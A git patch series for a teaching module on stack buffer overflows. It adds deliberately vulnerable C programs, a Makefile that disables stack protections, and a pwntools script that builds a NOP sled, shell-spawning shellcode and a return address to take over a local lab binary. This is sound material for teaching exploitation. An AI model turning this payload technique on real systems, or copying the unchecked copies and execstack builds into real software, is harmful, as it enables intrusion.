From 7d143c6c84a4234efcf9368e0c7116981c274bfe Mon Sep 17 00:00:00 2001 From: Dan Goldsmith Date: Mon, 22 Mar 2021 12:12:31 +0000 Subject: [PATCH 1/2] Initial Overflow stuff added --- Week9_Overflows/Classic_Overflows/classic.c | 24 ++++++++ .../Classic_Overflows/genPayload.py | 61 +++++++++++++++++++ Week9_Overflows/Intro/firstOverflow.c | 43 +++++++++++++ Week9_Overflows/Intro/stackFrames.c | 11 ++++ Week9_Overflows/Intro/strOverflow.c | 9 +++ 5 files changed, 148 insertions(+) create mode 100644 Week9_Overflows/Classic_Overflows/classic.c create mode 100644 Week9_Overflows/Classic_Overflows/genPayload.py create mode 100644 Week9_Overflows/Intro/firstOverflow.c create mode 100644 Week9_Overflows/Intro/stackFrames.c create mode 100644 Week9_Overflows/Intro/strOverflow.c diff --git a/Week9_Overflows/Classic_Overflows/classic.c b/Week9_Overflows/Classic_Overflows/classic.c new file mode 100644 index 0000000..7653ce9 --- /dev/null +++ b/Week9_Overflows/Classic_Overflows/classic.c @@ -0,0 +1,24 @@ +#include +#include +#include + +int BUFFER=200; + +int copy(char* input){ + char buffer[BUFFER]; + strcpy(buffer, input); + +} + +int main(int argc, char* argv[]){ + /* Main Function*/ + char buf[400]; + printf("Smash The Stack\n"); + //Get the data + int r; + r = read(0, buf, 400); //Save Version + + int out = copy(buf); + printf("Lose :(\n"); + return 0; +} diff --git a/Week9_Overflows/Classic_Overflows/genPayload.py b/Week9_Overflows/Classic_Overflows/genPayload.py new file mode 100644 index 0000000..be87943 --- /dev/null +++ b/Week9_Overflows/Classic_Overflows/genPayload.py @@ -0,0 +1,61 @@ +from pwn import * + +#Update the Context with the Architecture and OS +context.update(arch="i386", os="linux") + +#Create a Process Object to talk to. This should be our Target Binary +p = process("./classic") + +# Do an initial read to get the welcome message +data = p.read() +print(data) #For Debugging + +raw_input("Attach GDB and press enter") #More debugging + + +# And add our Shellcode + +#shellcode ="".join(["\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46", +# "\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68", +# "\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"]) + +#shellcode = "".join(["\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70", +# "\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61", +# "\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52", +# "\x51\x53\x89\xe1\xcd\x80"]) +shellcode = asm(shellcraft.sh()) +print(shellcraft.sh()) + + +# Offset to EIP (You need to calculate this) +OFFSET = 236 + +#Address we want to jump to (You need to supply this) +#Pwntools will automatically convert to the correct endianness +#TARGET_ADDRESS = p32(0xffffd080) +TARGET_ADDRESS = p32(0x0804901d) +#TARGET_ADDRESS = "BBBB" + + +#Now we will build our payload + +PADD = 150 +payloadLen = OFFSET - len(shellcode) #How many 'A's to Pad with +payloadLen = payloadLen - PADD #I like a bit of space below the shellcode too + +payload = "\x90"*payloadLen +payload += shellcode #Add Shellcode +payload += "\x90"*PADD#30 #More Nops +payload += TARGET_ADDRESS #Address to Jump to + +print("PAYLOAD {0} \n{1}".format(payload, len(payload))) +p.writeline(payload) #Write it to the Binary +p.interactive() #Go into interactive mode. + +#34 is OK, > 34 Crashses + + + +#Compile With +#gcc -m32 -fno-stack-protector -z execstack -no-pie classic.c -o classic + diff --git a/Week9_Overflows/Intro/firstOverflow.c b/Week9_Overflows/Intro/firstOverflow.c new file mode 100644 index 0000000..7b49c59 --- /dev/null +++ b/Week9_Overflows/Intro/firstOverflow.c @@ -0,0 +1,43 @@ +#include +#include +#include +#include + +int BUFFER=150; + +void win(void){ + /*Win Condition + We Want to jump here + */ + printf("\n ===== Win ===== \n\n"); + system("/bin/sh"); //Tradition to get a shell +} + +void lose(void){ + /* Lose Condition */ + printf("Current Memory Address is %p\n",lose); + printf("Aim for %p\n", win); + printf("Lose :(\n"); +} + +int main(int argc, char* argv[]){ + /* Main Function*/ + + //Pointer to the lose function + void (*fp)(void) = lose; + + char buffer[BUFFER]; + printf("Overflow the Buffer\n"); + + if (argc != 2){ + printf("Overflow the buffer\n"); + printf("Hint! Try `python -c \"print 'A'*100\"`\n"); + return -1; + } + + memcpy(buffer, argv[1], strlen(argv[1])); + printf("Off to %p\n",fp); + fp(); + + return 0; +} diff --git a/Week9_Overflows/Intro/stackFrames.c b/Week9_Overflows/Intro/stackFrames.c new file mode 100644 index 0000000..2dfb5cf --- /dev/null +++ b/Week9_Overflows/Intro/stackFrames.c @@ -0,0 +1,11 @@ +int add(int var1, int var2){ + //Add two numbers + int total; + total = var1+var2; + return total; +} + +void main(int argv, char* argc){ + //Function call + int total = add(10, 20); +} diff --git a/Week9_Overflows/Intro/strOverflow.c b/Week9_Overflows/Intro/strOverflow.c new file mode 100644 index 0000000..7babffa --- /dev/null +++ b/Week9_Overflows/Intro/strOverflow.c @@ -0,0 +1,9 @@ +#include +#include + +void main(void){ + char theString[15]; + //Copy a String that is longer than the space allocated + strcpy(theString, "Hello World, This Is A Long String"); + printf("%s", theString); +} From d17b87dbb077cd7ba905ff3b2411d21f7668c62e Mon Sep 17 00:00:00 2001 From: Dan Goldsmith Date: Mon, 22 Mar 2021 12:18:10 +0000 Subject: [PATCH 2/2] First Overflow makefile added --- Week9_Overflows/Intro/Makefile | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 Week9_Overflows/Intro/Makefile diff --git a/Week9_Overflows/Intro/Makefile b/Week9_Overflows/Intro/Makefile new file mode 100644 index 0000000..f86f689 --- /dev/null +++ b/Week9_Overflows/Intro/Makefile @@ -0,0 +1,13 @@ +# Build the first overflow target + +CC = gcc +CFLAGS = -m32 -g -z execstack + + +firstOverflow: firstOverflow.c + + $(CC) $(CFLAGS) firstOverflow.c -o firstOverflow + + +all: firstOverflow +